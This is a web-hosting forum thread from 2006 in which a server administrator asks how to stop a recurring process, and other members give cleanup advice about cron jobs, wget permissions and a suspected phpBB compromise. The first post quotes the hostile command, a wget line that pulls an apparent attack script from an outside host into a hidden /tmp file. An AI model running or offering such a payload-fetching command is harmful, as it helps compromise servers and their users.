Results 1 to 5 of 5

Thread: Kill PID

  1. #1
    Member
    Join Date
    Apr 2004
    Location
    Israel
    Posts
    22

    Default Kill PID

    I have this running or trying to:

    wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791

    I kill it from WHM but it comes right back. How can I kill it DEAD and block it, It is bogging down the server.

  2. #2
    cPanel Partner NOC cPanel Partner NOC Badge
    Join Date
    Oct 2003
    Posts
    2,002

    Default

    it's probably one of your users cron jobs delete the cron
    Last edited by dalem; 04-11-2006 at 03:20 PM.
    Lowest Host/Empire Technology LLC
    Affordable hosting solutions http://empire-hosting.net
    List Your hosting site FREE in http://hostgeneration.com

  3. #3
    Member dave9000's Avatar
    Join Date
    Apr 2003
    Location
    arkansas
    Posts
    891
    cPanel/WHM Access Level

    Root Administrator

    Default

    chmod 0000 /usr/bin/wget

    to start with
    then kill any process associated with wget or any /tmp/* files

    then cd /tmp and remove any odd looking files

    once you get things cleaned up then chmod 0700 /usr/bin/wget

    I am sure there is several more steps that could be added here but I was up all night fixing a courier-pop issue so a little brain dead tonight
    Dave Browning
    Intersite Technologies
    Greenbrier Ar
    dave@isitetech.com

  4. #4
    Member Brad's Avatar
    Join Date
    Aug 2001
    Posts
    236

    Default

    It's some kind of shell hack to run perl process..

    I saw the same thing today on one of our servers. Also, look for a process running by nobody such as /usr/sbin/apache2 or /usr/sbin/apache with a perl process hogging the cpu..

    I believe it's a phpbb hack, not sure what it's doing? I have not found the exact source, so I'm going through all phpbb installations on the server.
    Last edited by Brad; 04-12-2006 at 02:09 AM.

  5. #5
    Member
    Join Date
    Apr 2004
    Location
    Israel
    Posts
    22

    Default Thanks

    Thanks Dave,
    I did just what you said and it worked great.

    I told my customers to up grade all php. One got hacked by the Turkish Hacker. It was a php hack.

    Thanks

Similar Threads

  1. Where to look for MySQL PID?
    By xoxoxo in forum New User Questions
    Replies: 1
    Last Post: 03-13-2010, 10:35 PM
  2. Mailman PID
    By tictic in forum New User Questions
    Replies: 4
    Last Post: 11-26-2009, 02:23 AM
  3. Can I trace a PID number?
    By prettydumb in forum cPanel & WHM Discussions
    Replies: 2
    Last Post: 08-31-2007, 02:10 AM
  4. script to kill pid if eat memory and resources
    By konrath in forum cPanel & WHM Discussions
    Replies: 3
    Last Post: 04-09-2006, 05:10 PM
  5. Hidden Pid detected!
    By bhznat in forum cPanel & WHM Discussions
    Replies: 8
    Last Post: 02-28-2005, 05:31 PM